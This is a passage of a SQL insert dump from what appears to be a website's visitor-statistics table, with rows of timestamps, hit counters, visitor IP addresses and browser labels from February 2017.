'37.73.238.155','chrome'),(88378,1487069315,3,3,0,0,'91.196.177.46','chrome'),(88379,1487070038,1,1,0,0,'91.196.178.71','chrome'),(88380,1487070233,1,1,0,0,'91.196.177.46','chrome'),(88381,1487070865,1,1,0,0,'91.196.178.133','firefox'),(88382,1487070910,1,1,0,0,'46.219.30.147','chrome'),(88383,1487071178,1,1,0,0,'91.196.178.71','chrome'),(88384,1487072337,1,1,0,0,'82.193.127.22','chrome'),(88385,1487074207,1,0,1,0,'66.249.76.108',''),(88386,1487074351,1,1,0,0,'91.196.178.68','firefox'),(88387,1487074501,1,1,0,0,'94.179.24.152','firefox'),(88388,1487074543,1,1,0,0,'95.133.9.30','chrome'),(88389,1487074922,1,1,0,0,'91.196.178.72','firefox'),(88390,1487075408,1,1,0,0,'82.193.127.22','chrome'),(88391,1487075498,1,1,0,0,'95.132.133.107','chrome'),(88392,1487075607,1,0,1,0,'66.249.76.27',''),(88393,1487075787,1,1,0,0,'91.196.178.40','chrome'),(88394,1487075849,7,7,0,0,'89.98.140.88','other'),(88395,1487076266,4,4,0,0,'93.180.64.220','other'),(88396,1487076624,1,1,0,0,'91.196.177.26','chrome'),(88397,1487076632,1,1,0,0,'136.243.75.15','other'),(88398,1487077293,3,3,0,0,'93.180.64.220','other'),(88399,1487077344,2,0,2,0,'66.249.66.81',''),(88400,1487077415,2,0,2,0,'66.249.76.27',''),(88401,1487077936,1,0,1,0,'66.249.66.87',''),(88402,1487078430,1,1,0,0,'195.49.151.99','chrome'),(88403,1487079922,1,1,0,0,'37.55.193.122','chrome'),(88404,1487081642,1,1,0,0,'94.179.24.152','firefox'),(88405,1487081717,1,1,0,0,'91.196.178.68','firefox'),(88406,1487082223,1,1,0,0,'37.53.229.30','firefox'),(88407,1487082432,1,0,1,0,'66.249.76.29',''),(88408,1487082793,1,1,0,0,'91.232.157.98','chrome'),(88409,1487082798,1,1,0,0,'5.255.253.67','other'),(88410,1487083481,1,1,0,0,'95.135.11.245','firefox'),(88411,1487084479,1,0,1,0,'207.46.13.172',''),(88412,1487085418,1,1,0,0,'91.196.178.165','chrome'),(88413,1487086105,1,1,0,0,'91.216.22.202','chrome'),(88414,1487086142,1,1,0,0,'66.249.93.157','chrome'),(88415,1487086542,1,0,1,0,'66.249.76.109',''),(88416,1487086921,1,1,0,0,'78.47.7.174','other'),(88417,1487086968,1,0,1,0,'66.249.76.107',''),(88418,1487086969,1,0,1,0,'66.249.76.29',''),(88419,1487086990,1,0,1,0,'66.249.76.27',''),(88420,1487087253,1,0,1,0,'66.249.76.108',''),(88421,1487088217,1,0,1,0,'66.249.66.87',''),(88422,1487088544,1,1,0,0,'130.193.51.19','other'),(88423,1487088559,1,1,0,0,'91.196.178.131','chrome'),(88424,1487088745,1,0,1,0,'66.249.76.107',''),(88425,1487089127,2,1,1,0,'66.249.76.109',''),(88426,1487089284,2,2,0,0,'62.210.162.42','chrome'),(88427,1487089729,1,0,1,0,'66.249.76.29',''),(88428,1487090234,1,0,1,0,'66.249.76.107',''),(88429,1487090417,1,1,0,0,'66.249.76.29','chrome'),(88430,1487090913,1,1,0,0,'141.8.183.19','other'),(88431,1487091328,1,1,0,0,'141.8.142.67','other'),(88432,1487091575,1,1,0,0,'78.111.190.23','chrome'),(88433,1487091653,1,1,0,0,'141.8.142.175','other'),(88434,1487091904,1,1,0,0,'91.196.178.37','chrome'),(88435,1487092346,1,1,0,0,'46.211.248.162','chrome'),(88436,1487095092,1,1,0,0,'91.196.178.68','firefox'),(88437,1487096673,1,1,0,0,'168.235.201.235','other'),(88438,1487096689,1,1,0,0,'37.54.168.65','other'),(88439,1487097110,1,1,0,0,'91.196.178.101','chrome'),(88440,1487098004,1,1,0,0,'46.133.22.156','chrome'),(88441,1487098047,1,0,1,0,'66.249.64.187',''),(88442,1487100039,1,1,0,0,'207.46.13.172','other'),(88443,1487100138,1,0,1,0,'66.249.64.57',''),(88444,1487101511,1,1,0,0,'207.46.13.59','other'),(88445,1487101921,1,1,0,0,'141.8.142.85','other'),(88446,1487101969,1,1,0,0,'141.8.142.206','other'),(88447,1487101984,1,1,0,0,'141.8.132.41','other'),(88448,1487101998,1,1,0,0,'130.193.37.7','other'),(88449,1487102010,1,1,0,0,'130.193.50.34','other'),(88450,1487102021,1,1,0,0,'141.8.142.67','other'),(88451,1487102522,1,1,0,0,'94.74.68.32','chrome'),(88452,1487105088,1,1,0,0,'46.211.248.139','chrome'),(88453,1487105613,1,1,0,0,'66.249.64.57','chrome'),(88454,1487105679,2,2,0,0,'62.210.162.42','chrome'),(88455,1487106095,1,1,0,0,'93.158.152.84','other'),(88456,1487106473,1,0,1,0,'66.249.64.187',''),(88457,1487106690,1,0,1,0,'66.249.64.179',''),(88458,1487108815,1,1,0,0,'89.185.0.146','chrome'),(88459,1487108834,1,1,0,0,'130.193.50.34','other'),(88460,1487109768,1,1,0,0,'180.76.15.15','other'),(88461,1487111074,1,1,0,0,'207.46.13.59','other'),(88462,1487113390,1,0,1,0,'66.249.64.61',''),(88463,1487113405,1,0,1,0,'66.249.64.57',''),(88464,1487113456,1,1,0,0,'5.1.9.2','chrome'),(88465,1487114525,1,0,1,0,'66.249.64.179',''),(88466,1487116853,3,3,0,0,'167.114.82.228','other'),(88467,1487118678,1,1,0,0,'141.8.183.25','other'),(88468,1487119129,1,1,0,0,'207.46.13.172','other'),(88469,1487120405,1,1,0,0,'157.55.39.250','other'),(88470,1487121340,1,1,0,0,'207.46.13.172','other'),(88471,1487123014,1,1,0,0,'207.46.13.59','other'),(88472,1487126368,3,0,3,0,'66.249.64.59',''),(88473,1487127117,2,0,2,0,'66.249.64.187',''),(88474,1487127701,1,0,1,0,'66.249.64.179',''),(88475,1487127725,1,1,0,0,'66.249.64.183','chrome'),(88476,1487131414,1,0,1,0,'66.249.64.179',''),(88477,1487131454,1,0,1,0,'66.249.64.61',''),(88478,1487132104,1,0,1,0,'66.249.64.57',''),(88479,1487132624,1,1,0,0,'141.8.183.25','other'),(88480,1487133016,1,1,0,0,'207.46.13.59','other'),(88481,1487133390,1,0,1,0,'66.249.64.179',''),(88482,1487136019,1,1,0,0,'180.76.15.6','other'),(88483,1487137320,1,1,0,0,'91.196.178.67','firefox'),(88484,1487140651,1,1,0,0,'163.172.68.121','other'),(88485,1487140712,1,1,0,0,'66.102.9.29','chrome'),(88486,1487140774,1,1,0,0,'195.230.141.254','chrome'),(88487,1487140886,1,1,0,0,'180.76.15.134','other'),(88488,1487140939,1,1,0,0,'91.196.178.66','chrome'),(88489,1487141293,1,1,0,0,'91.196.178.166','chrome'),(88490,1487141834,1,1,0,0,'207.46.13.172','other'),(88491,1487142521,1,1,0,0,'207.46.13.59','other'),(88492,1487142854,1,1,0,0,'176.122.98.115','opera'),(88493,1487143206,3,3,0,0,'91.196.178.72','firefox'),(88494,1487143699,1,1,0,0,'178.95.71.93','chrome'),(88495,1487143950,1,1,0,0,'91.196.178.132','firefox'),(88496,1487144508,1,1,0,0,'91.196.178.72','firefox'),(88497,1487144594,1,1,0,0,'37.55.195.63','chrome'),(88498,1487144673,2,2,0,0,'104.45.18.178','other'),(88499,1487144677,1,1,0,0,'37.53.229.30','firefox'),(88500,1487144887,1,1,0,0,'82.145.223.56','opera'),(88501,1487145320,1,1,0,0,'62.80.185.138','chrome'),(88502,1487146226,1,1,0,0,'37.52.23.154','chrome'),(88503,1487146654,1,0,1,0,'66.249.64.187',''),(88504,1487147235,1,1,0,0,'91.196.178.71','chrome'),(88505,1487149291,1,1,0,0,'46.201.241.5','chrome'),(88506,1487149298,1,1,0,0,'130.193.50.34','other'),(88507,1487149922,1,1,0,0,'178.93.23.223','chrome'),(88508,1487151120,1,1,0,0,'37.53.229.30','firefox'),(88509,1487151313,1,1,0,0,'95.132.45.126','firefox'),(88510,1487151615,1,1,0,0,'80.84.179.150','chrome'),(88511,1487151841,1,1,0,0,'157.55.39.250','other'),(88512,1487151852,1,1,0,0,'178.95.176.49','firefox'),(88513,1487152211,1,1,0,0,'93.183.226.149','firefox'),(88514,1487152295,1,1,0,0,'91.196.177.26','chrome'),(88515,1487153445,1,1,0,0,'91.196.178.39','firefox'),(88516,1487154208,1,1,0,0,'62.210.157.95','other'),(88517,1487154220,1,1,0,0,'91.196.178.65','chrome'),(88518,1487154815,1,1,0,0,'157.55.39.250','other'),(88519,1487155985,1,1,0,0,'37.53.15.123','chrome'),(88520,1487156273,1,1,0,0,'37.53.229.30','firefox'),(88521,1487156429,1,1,0,0,'91.196.178.132','firefox'),(88522,1487156521,3,3,0,0,'88.198.67.69','other'),(88523,1487158583,1,1,0,0,'91.196.178.132','firefox'),(88524,1487158832,1,1,0,0,'46.219.30.147','chrome'),(88525,1487159372,1,1,0,0,'194.44.215.70','firefox'),(88526,1487159425,1,0,1,0,'66.249.64.59',''),(88527,1487160487,1,1,0,0,'91.196.178.65','firefox'),(88528,1487161828,1,1,0,0,'94.179.84.179','firefox'),(88529,1487162515,1,1,0,0,'94.76.66.147','other'),(88530,1487162815,1,1,0,0,'178.95.176.49','firefox'),(88531,1487162878,1,1,0,0,'91.124.235.138','chrome'),(88532,1487163071,1,1,0,0,'37.53.229.30','firefox'),(88533,1487163165,1,0,1,0,'66.249.64.59',''),(88534,1487163475,1,0,1,0,'157.55.39.250',''),(88535,1487164894,1,1,0,0,'91.124.111.181','chrome'),(88536,1487165577,1,1,0,0,'82.207.110.24','chrome'),(88537,1487166391,1,1,0,0,'91.196.177.46','chrome'),(88538,1487166435,1,1,0,0,'217.69.133.203','other'),(88539,1487166538,1,1,0,0,'91.196.178.71','firefox'),(88540,1487166630,1,1,0,0,'91.196.178.71','chrome'),(88541,1487166928,1,1,0,0,'91.196.178.65','firefox'),(88542,1487167482,1,1,0,0,'91.196.178.66','chrome'),(88543,1487167523,1,1,0,0,'194.44.144.18','chrome'),(88544,1487167650,1,1,0,0,'91.196.178.36','chrome'),(88545,1487167852,1,1,0,0,'91.196.178.65','firefox'),(88546,1487168167,1,1,0,0,'178.216.5.24','chrome'),(88547,1487168169,1,0,1,0,'66.249.64.179',''),(88548,1487168356,1,0,1,0,'157.55.39.250',''),(88549,1487168732,1,1,0,0,'91.196.178.72','firefox'),(88550,1487168763,1,0,1,0,'66.249.64.187',''),(88551,1487169042,1,1,0,0,'91.196.177.26','chrome'),(88552,1487169046,1,1,0,0,'91.192.149.231','other'),(88553,1487169050,1,1,0,0,'52.164.215.190','opera'),(88554,1487169317,1,1,0,0,'91.196.178.34','firefox'),(88555,1487169335,1,1,0,0,'130.193.50.34','other'),(88556,1487169386,1,1,0,0,'91.196.178.165','chrome'),(88557,1487169411,1,1,0,0,'207.46.13.172','other'),(88558,1487169706,1,1,0,0,'91.196.178.166','chrome'),(88559,1487170641,1,1,0,0,'193.194.127.217','firefox'),(88560,1487170780,1,1,0,0,'66.249.93.157','chrome'),(88561,1487171570,1,0,1,0,'66.249.65.60',''),(88562,1487171632,1,1,0,0,'46.133.125.253','other'),(88563,1487171713,1,1,0,0,'178.92.77.174','other'),(88564,1487174441,2,2,0,0,'62.210.162.42','chrome'),(88565,1487174578,1,1,0,0,'180.76.15.142','other'),(88566,1487174782,1,1,0,0,'66.249.65.55','chrome'),(88567,1487174783,2,2,0,0,'66.249.65.56','chrome'),(88568,1487177105,1,1,0,0,'217.69.133.223','other'),(88569,1487177572,1,1,0,0,'94.178.147.59','firefox'),(88570,1487178609,1,1,0,0,'91.196.178.168','other'),(88571,1487179057,1,1,0,0,'157.55.39.250','other'),(88572,1487179245,1,1,0,0,'130.180.217.158','chrome'),(88573,1487179399,1,0,1,0,'66.249.65.61',''),(88574,1487179428,1,0,1,0,'66.249.65.55',''),(88575,1487181534,1,1,0,0,'66.249.65.56','chrome'),(88576,1487182023,2,2,0,0,'91.196.178.168','chrome'),(88577,1487182114,2,2,0,0,'207.46.13.59','other'),(88578,1487182342,1,0,1,0,'66.249.65.61',''),(88579,1487183003,1,1,0,0,'46.219.240.22','chrome'),(88580,1487183402,1,1,0,0,'195.43.70.10','other'),(88581,1487186987,1,0,1,0,'66.249.65.61',''),(88582,1487187814,2,2,0,0,'62.210.162.42','chrome'),(88583,1487187963,1,0,1,0,'66.249.65.62',''),(88584,1487188795,1,1,0,0,'66.102.9.27','chrome'),(88585,1487191397,1,1,0,0,'180.76.15.157','other'),(88586,1487192814,1,0,1,0,'66.249.65.57',''),(88587,1487193284,1,1,0,0,'37.57.88.193','chrome'),(88588,1487196877,1,1,0,0,'157.55.39.250','other'),(88589,1487196984,2,2,0,0,'163.172.68.103','other'),(88590,1487197600,1,1,0,0,'207.46.13.59','other'),(88591,1487198365,1,1,0,0,'180.76.15.158','other'),(88592,1487198644,1,1,0,0,'188.163.74.47','chrome'),(88593,1487198730,1,1,0,0,'207.46.13.172','other'),(88594,1487199404,1,1,0,0,'157.55.39.250','other'),(88595,1487204747,1,1,0,0,'157.55.39.250','other'),(88596,1487207785,1,0,1,0,'66.249.65.60',''),(88597,1487208948,1,1,0,0,'180.76.15.162','other'),(88598,1487214091,1,1,0,0,'157.55.39.250','other'),(88599,1487218519,2,2,0,0,'130.193.51.19','other'),(88600,1487218552,3,3,0,0,'141.8.142.175','other'),(88601,1487218592,1,1,0,0,'141.8.142.58','other'),(88602,1487218605,1,1,0,0,'141.8.183.25','other'),(88603,1487220630,1,1,0,0,'207.46.13.59','other'),(88604,1487221680,1,1,0,0,'207.46.13.59','other'),(88605,1487222034,1,1,0,0,'93.158.152.61','other'),(88606,1487222038,2,2,0,0,'178.154.189.31','other'),(88607,1487223472,1,1,0,0,'66.249.65.55','chrome'),(88608,1487224227,1,1,0,0,'91.196.178.72','firefox'),(88609,1487225561,2,2,0,0,'91.196.178.71','chrome'),(88610,1487227580,1,1,0,0,'37.52.23.154','chrome'),(88611,1487227860,1,1,0,0,'37.53.40.70','chrome'),(88612,1487228529,1,1,0,0,'157.55.39.250','other'),(88613,1487228612,1,1,0,0,'217.69.133.221','other'),(88614,1487228640,1,1,0,0,'91.196.178.66','firefox'),(88615,1487229310,1,1,0,0,'207.46.13.172','other'),(88616,1487229986,1,1,0,0,'37.53.74.49','other'),(88617,1487230256,1,0,1,0,'66.249.65.62',''),(88618,1487231035,1,1,0,0,'141.8.183.25','other'),(88619,1487231039,1,1,0,0,'141.8.142.61','other'),(88620,1487231159,1,0,1,0,'66.249.65.61',''),(88621,1487231172,1,1,0,0,'31.43.44.46','chrome'),(88622,1487232212,1,1,0,0,'46.200.35.197','opera'),(88623,1487232323,1,1,0,0,'91.196.178.167','chrome'),(88624,1487232759,1,0,1,0,'66.249.65.57',''),(88625,1487233315,1,1,0,0,'180.76.15.24','other'),(88626,1487233429,1,1,0,0,'212.26.134.106','firefox'),(88627,1487233516,1,1,0,0,'91.217.66.22','chrome'),(88628,1487233629,1,1,0,0,'91.196.178.136','firefox'),(88629,1487234471,1,0,1,0,'66.249.65.56',''),(88630,1487234771,1,1,0,0,'130.193.51.19','other'),(88631,1487234786,1,1,0,0,'37.53.229.30','firefox'),(88632,1487235289,1,1,0,0,'81.163.125.188','chrome'),(88633,1487236224,1,0,1,0,'66.249.65.60',''),(88634,1487236348,1,1,0,0,'95.221.251.32','msie'),(88635,1487236758,1,1,0,0,'91.196.178.72','firefox'),(88636,1487236854,1,1,0,0,'94.179.35.112','firefox'),(88637,1487236991,1,1,0,0,'94.179.69.231','firefox'),(88638,1487237071,1,1,0,0,'66.249.65.55','chrome'),(88639,1487237080,1,1,0,0,'157.55.39.250','other'),(88640,1487237465,1,1,0,0,'207.46.13.59','other'),(88641,1487237589,1,1,0,0,'91.196.178.70','chrome'),(88642,1487238024,1,1,0,0,'46.200.35.197','opera'),(88643,1487239095,1,1,0,0,'91.196.178.72','firefox'),(88644,1487239338,1,1,0,0,'91.196.178.161','chrome'),(88645,1487239613,1,1,0,0,'91.196.177.26','chrome'),(88646,1487239636,1,1,0,0,'91.196.178.70','chrome'),(88647,1487240299,1,1,0,0,'130.180.217.115','chrome'),(88648,1487240807,1,1,0,0,'66.249.65.57','chrome'),(88649,1487240940,1,1,0,0,'91.196.177.46','chrome'),(88650,1487241162,1,0,1,0,'66.249.65.62',''),(88651,1487241362,1,1,0,0,'5.228.35.80','msie'),(88652,1487242353,1,1,0,0,'37.53.229.30','firefox'),(88653,1487242685,1,1,0,0,'91.196.178.70','chrome'),(88654,1487242686,1,1,0,0,'91.196.178.71','chrome'),(88655,1487243477,1,1,0,0,'95.84.251.217','msie'),(88656,1487244722,1,1,0,0,'212.1.102.23','chrome'),(88657,1487244749,1,1,0,0,'141.8.132.10','other'),(88658,1487246499,1,0,1,0,'66.249.65.60',''),(88659,1487246528,1,0,1,0,'66.249.65.61',''),(88660,1487247695,1,1,0,0,'91.196.178.72','firefox'),(88661,1487248442,1,1,0,0,'130.180.218.119','firefox'),(88662,1487249116,1,0,1,0,'66.249.65.57',''),(88663,1487249902,1,1,0,0,'193.108.50.39','chrome'),(88664,1487250270,1,1,0,0,'217.69.133.215','other'),(88665,1487251114,1,1,0,0,'85.198.186.254','firefox'),(88666,1487251180,1,1,0,0,'95.134.97.151','chrome'),(88667,1487251692,1,1,0,0,'195.10.210.49','chrome'),(88668,1487252710,1,1,0,0,'91.196.177.26','chrome'),(88669,1487252718,1,0,1,0,'66.249.65.62',''),(88670,1487252882,1,1,0,0,'66.249.65.55','chrome'),(88671,1487253212,1,1,0,0,'46.200.44.212','chrome'),(88672,1487254644,1,1,0,0,'82.207.49.110','firefox'),(88673,1487255204,1,1,0,0,'193.107.72.90','chrome'),(88674,1487255292,1,1,0,0,'46.201.227.188','opera'),(88675,1487255431,1,1,0,0,'66.249.93.156','chrome'),(88676,1487255538,1,1,0,0,'91.196.178.67','firefox'),(88677,1487256843,1,1,0,0,'91.196.178.67','firefox'),(88678,1487256959,1,1,0,0,'194.44.40.47','chrome'),(88679,1487257215,2,2,0,0,'107.150.59.98','other'),(88680,1487257221,1,1,0,0,'188.239.96.207','chrome'),(88681,1487257238,1,1,0,0,'141.8.142.67','other'),(88682,1487257933,1,0,1,0,'66.249.65.60',''),(88683,1487257978,1,1,0,0,'91.196.177.15','chrome'),(88684,1487258111,1,1,0,0,'207.46.13.59','other'),(88685,1487259527,1,0,1,0,'66.249.65.60',''),(88686,1487260114,1,0,1,0,'66.249.65.61',''),(88687,1487260790,2,2,0,0,'37.54.16.42','chrome'),(88688,1487261371,1,1,0,0,'141.8.132.41','other'),(88689,1487261447,1,1,0,0,'95.84.183.196','msie'),(88690,1487261603,1,0,1,0,'66.249.65.55',''),(88691,1487261737,3,3,0,0,'130.193.50.34','other'),(88692,1487262127,1,1,0,0,'141.8.183.25','other'),(88693,1487262300,2,2,0,0,'141.8.142.175','other'),(88694,1487262515,3,3,0,0,'130.193.51.19','other'),(88695,1487262574,1,1,0,0,'141.8.142.58','other'),(88696,1487262672,2,2,0,0,'130.193.50.34','other'),(88697,1487262899,1,1,0,0,'93.158.152.40','other'),(88698,1487263249,1,1,0,0,'157.55.39.250','other'),(88699,1487264126,2,0,2,0,'66.249.65.60',''),(88700,1487264679,1,0,1,0,'66.249.65.61',''),(88701,1487264869,1,1,0,0,'109.63.193.114','msie'),(88702,1487264967,1,1,0,0,'91.196.178.167','chrome'),(88703,1487265217,1,1,0,0,'217.69.133.223','other'),(88704,1487265311,1,1,0,0,'178.92.252.150','chrome'),(88705,1487265759,1,1,0,0,'91.196.178.38','chrome'),(88706,1487266826,1,1,0,0,'91.196.178.133','chrome'),(88707,1487267084,1,0,1,0,'66.249.65.55',''),(88708,1487267489,1,1,0,0,'141.8.183.25','other'),(88709,1487268497,1,1,0,0,'5.166.131.92','msie'),(88710,1487268569,1,1,0,0,'66.102.9.25','chrome'),(88711,1487271325,1,0,1,0,'66.249.64.187',''),(88712,1487271344,1,0,1,0,'66.249.64.179',''),(88713,1487271420,1,0,1,0,'66.249.64.61',''),(88714,1487271624,1,1,0,0,'213.179.252.224','chrome'),(88715,1487271628,1,1,0,0,'141.8.142.175','other'),(88716,1487272085,2,0,2,0,'66.249.64.59',''),(88717,1487272508,1,1,0,0,'63.243.252.48','other'),(88718,1487272659,1,1,0,0,'130.193.51.19','other'),(88719,1487272666,3,3,0,0,'141.8.142.175','other'),(88720,1487272670,3,3,0,0,'130.193.50.34','other'),(88721,1487272680,1,1,0,0,'141.8.183.25','other'),(88722,1487272858,1,0,1,0,'66.249.64.183',''),(88723,1487273199,1,0,1,0,'66.249.64.59',''),(88724,1487275396,2,0,2,0,'66.249.64.183',''),(88725,1487275951,64,64,0,0,'94.23.0.221','firefox'),(88726,1487277368,1,0,1,0,'66.249.64.179',''),(88727,1487279940,1,0,1,0,'66.249.64.183',''),(88728,1487280602,1,1,0,0,'130.180.212.84','chrome'),(88729,1487284397,1,0,1,0,'66.249.64.57',''),(88730,1487289254,1,1,0,0,'207.46.13.172','other'),(88731,1487290309,1,1,0,0,'176.107.176.107','other'),(88732,1487290808,1,1,0,0,'217.69.133.9','other'),(88733,1487295115,1,1,0,0,'217.69.133.216','other'),(88734,1487295530,1,1,0,0,'66.249.64.187','chrome'),(88735,1487295737,1,0,1,0,'66.249.64.61',''),(88736,1487300241,1,0,1,0,'66.249.64.187',''),(88737,1487301230,2,0,2,0,'66.249.64.183',''),(88738,1487302823,1,1,0,0,'52.86.176.3','other'),(88739,1487305262,1,0,1,0,'66.249.64.187',''),(88740,1487305277,1,1,0,0,'66.249.64.179','chrome'),(88741,1487308432,1,1,0,0,'66.249.64.183','chrome'),(88742,1487309477,1,0,1,0,'68.180.229.99',''),(88743,1487309592,1,1,0,0,'66.249.93.156','chrome'),(88744,1487310269,1,1,0,0,'91.196.178.72','firefox'),(88745,1487310823,21,21,0,0,'208.43.225.84','other'),(88746,1487310875,27,27,0,0,'208.43.225.85','other'),(88747,1487311620,1,1,0,0,'91.196.178.70','firefox'),(88748,1487312598,1,1,0,0,'91.196.178.66','chrome'),(88749,1487312879,1,1,0,0,'91.196.178.71','chrome'),(88750,1487312924,1,1,0,0,'176.109.201.15','firefox'),(88751,1487312938,1,1,0,0,'141.8.142.58','other'),(88752,1487313714,1,1,0,0,'91.196.178.65','firefox'),(88753,1487314659,1,1,0,0,'91.196.178.72','firefox'),(88754,1487315150,1,1,0,0,'141.8.142.58','other'),(88755,1487315241,1,0,1,0,'66.249.64.179',''),(88756,1487315440,1,1,0,0,'95.132.48.84','firefox'),(88757,1487315524,1,1,0,0,'37.52.19.158','firefox'),(88758,1487316394,1,1,0,0,'95.132.48.84','firefox'),(88759,1487316591,1,1,0,0,'217.69.133.227','other'),(88760,1487317427,1,0,1,0,'66.249.64.179',''),(88761,1487317558,1,1,0,0,'91.196.178.72','firefox'),(88762,1487317584,1,1,0,0,'130.193.50.34','other'),(88763,1487318650,1,1,0,0,'95.220.112.231','chrome'),(88764,1487319113,1,1,0,0,'91.196.177.26','chrome'),(88765,1487319232,1,1,0,0,'130.180.220.23','chrome'),(88766,1487319268,1,1,0,0,'141.8.142.175','other'),(88767,1487319543,1,1,0,0,'130.193.50.34','other'),(88768,1487320057,1,1,0,0,'91.196.178.163','chrome'),(88769,1487320152,1,1,0,0,'46.18.0.75','chrome'),(88770,1487320728,1,1,0,0,'93.127.126.246','chrome'),(88771,1487321251,1,1,0,0,'37.55.3.137','chrome'),(88772,1487321433,1,1,0,0,'91.196.177.15','firefox'),(88773,1487321448,2,2,0,0,'91.196.178.66','chrome'),(88774,1487321867,1,1,0,0,'188.232.140.247','msie'),(88775,1487321884,1,1,0,0,'195.69.222.67','chrome'),(88776,1487322129,1,1,0,0,'130.193.50.34','other'),(88777,1487322273,1,1,0,0,'91.196.178.66','firefox'),(88778,1487322293,1,1,0,0,'128.69.152.12','msie'),(88779,1487322476,1,1,0,0,'130.180.220.179','firefox'),(88780,1487322613,1,1,0,0,'91.196.178.72','firefox'),(88781,1487322867,1,1,0,0,'91.196.178.129','firefox'),(88782,1487323684,1,0,1,0,'66.249.64.179',''),(88783,1487323689,1,1,0,0,'5.228.95.51','firefox'),(88784,1487323741,1,1,0,0,'109.63.190.253','chrome'),(88785,1487323990,1,1,0,0,'62.138.0.21','firefox'),(88786,1487324758,1,1,0,0,'91.196.178.66','firefox'),(88787,1487325978,1,1,0,0,'46.200.115.135','chrome'),(88788,1487326025,1,1,0,0,'130.193.51.19','other'),(88789,1487326033,1,1,0,0,'91.196.178.72','firefox'),(88790,1487326053,3,3,0,0,'91.196.178.66','firefox'),(88791,1487326275,1,1,0,0,'91.196.178.66','chrome'),(88793,1487326521,1,1,0,0,'37.55.187.246','chrome'),(88794,1487327015,1,1,0,0,'91.196.178.36','other'),(88795,1487327297,1,1,0,0,'94.179.104.139','firefox'),(88796,1487327351,1,1,0,0,'91.196.178.68','firefox'),(88797,1487327368,1,1,0,0,'91.196.178.39','firefox'),(88798,1487327738,5,5,0,0,'141.8.142.175','other'),(88799,1487327741,4,4,0,0,'130.193.50.34','other'),(88800,1487327778,4,4,0,0,'141.8.183.25','other'),(88801,1487327789,2,2,0,0,'130.193.51.19','other'),(88802,1487327792,3,3,0,0,'141.8.142.61','other'),(88803,1487328259,1,1,0,0,'91.196.177.46','chrome'),(88804,1487328700,1,1,0,0,'141.8.142.15','other'),(88805,1487328718,1,1,0,0,'157.55.39.250','other'),(88806,1487328770,1,1,0,0,'5.255.253.63','other'),(88807,1487328776,1,1,0,0,'5.255.253.39','other'),(88808,1487328910,1,1,0,0,'93.158.178.38','other'),(88810,1487328941,4,4,0,0,'130.193.50.34','other'),(88811,1487328952,3,3,0,0,'141.8.142.175','other'),(88812,1487329158,1,1,0,0,'91.196.177.46','firefox'),(88813,1487329931,1,1,0,0,'207.46.13.59','other'),(88814,1487330030,1,1,0,0,'91.217.197.3','firefox'),(88815,1487330183,1,1,0,0,'194.28.54.232','chrome'),(88816,1487330957,2,2,0,0,'141.8.142.175','other'),(88817,1487331409,1,1,0,0,'91.196.178.129','firefox'),(88818,1487331713,1,1,0,0,'130.193.50.34','other'),(88819,1487332081,1,1,0,0,'157.55.39.250','other'),(88820,1487332413,1,1,0,0,'91.196.177.46','other'),(88821,1487332855,1,1,0,0,'130.193.50.34','other'),(88822,1487332858,1,1,0,0,'141.8.142.175','other'),(88823,1487333550,1,1,0,0,'66.249.64.57','chrome'),(88824,1487333770,1,1,0,0,'91.196.178.129','chrome'),(88825,1487333827,1,0,1,0,'66.249.64.183',''),(88826,1487334116,2,2,0,0,'91.196.178.129','firefox'),(88827,1487334303,1,0,1,0,'66.249.64.61',''),(88828,1487334765,2,2,0,0,'130.193.50.34','other'),(88829,1487335014,1,1,0,0,'91.196.177.46','chrome'),(88830,1487335370,1,1,0,0,'91.196.178.67','firefox'),(88831,1487335393,1,1,0,0,'213.108.44.11','chrome'),(88832,1487335585,1,1,0,0,'111.206.36.143','firefox'),(88833,1487335764,1,1,0,0,'180.76.15.10','other'),(88834,1487336269,1,1,0,0,'91.196.178.66','chrome'),(88835,1487336775,1,1,0,0,'213.108.44.11','chrome'),(88836,1487336853,1,1,0,0,'178.92.75.100','firefox'),(88837,1487336978,1,1,0,0,'111.206.36.9','firefox'),(88838,1487336980,1,1,0,0,'111.206.36.19','firefox'),(88839,1487337015,1,1,0,0,'111.206.36.18','firefox'),(88840,1487337563,1,0,1,0,'66.249.64.187',''),(88841,1487338392,1,1,0,0,'94.179.104.139','firefox'),(88842,1487339919,1,1,0,0,'91.196.178.130','chrome'),(88843,1487340132,1,1,0,0,'178.92.1.183','chrome'),(88844,1487340468,1,1,0,0,'94.179.11.100','firefox'),(88845,1487340571,1,1,0,0,'188.32.233.190','chrome'),(88846,1487340715,1,1,0,0,'91.196.178.66','chrome'),(88847,1487341128,1,1,0,0,'185.26.180.164','other'),(88848,1487342116,1,1,0,0,'91.196.178.165','chrome'),(88849,1487342224,2,2,0,0,'207.46.13.172','other'),(88850,1487344520,1,1,0,0,'94.179.208.20','chrome'),(88851,1487344641,1,1,0,0,'46.200.14.177','chrome'),(88852,1487344751,1,0,1,0,'68.180.230.114',''),(88853,1487345253,1,1,0,0,'217.69.133.228','other'),(88854,1487345259,1,1,0,0,'94.179.56.238','firefox'),(88855,1487345849,1,1,0,0,'212.90.162.134','firefox'),(88856,1487346696,1,0,1,0,'66.249.64.179',''),(88857,1487347127,1,1,0,0,'95.135.240.209','chrome'),(88858,1487347216,1,1,0,0,'207.46.13.59','other'),(88859,1487347814,1,1,0,0,'178.92.75.100','firefox'),(88860,1487348250,1,0,1,0,'66.249.64.179',''),(88861,1487348599,1,1,0,0,'91.196.178.35','chrome'),(88862,1487349760,1,0,1,0,'66.249.64.61',''),(88863,1487350096,1,1,0,0,'130.193.51.19','other'),(88864,1487350100,1,1,0,0,'130.193.50.34','other'),(88865,1487350116,1,1,0,0,'66.249.64.59','chrome'),(88866,1487353357,1,0,1,0,'66.249.64.183',''),(88867,1487353570,1,1,0,0,'91.124.238.100','chrome'),(88868,1487353686,1,0,1,0,'66.249.64.179',''),(88869,1487354109,1,1,0,0,'91.196.178.71','firefox'),(88870,1487354260,1,1,0,0,'66.249.64.179','chrome'),(88871,1487359515,1,1,0,0,'207.46.13.172','other'),(88872,1487359588,1,1,0,0,'95.24.120.24','msie'),(88873,1487360026,1,0,1,0,'66.249.64.187',''),(88874,1487360375,1,1,0,0,'94.45.144.96','chrome'),(88875,1487362284,1,1,0,0,'188.244.45.43','msie'),(88876,1487362658,1,1,0,0,'66.249.64.187','chrome'),(88877,1487362837,1,1,0,0,'5.255.253.39','other'),(88878,1487363641,1,1,0,0,'77.37.137.48','msie'),(88879,1487363998,1,1,0,0,'91.196.178.164','chrome'),(88880,1487364331,1,1,0,0,'66.249.64.187','chrome'),(88881,1487366044,1,0,1,0,'66.249.64.179',''),(88882,1487366340,1,1,0,0,'4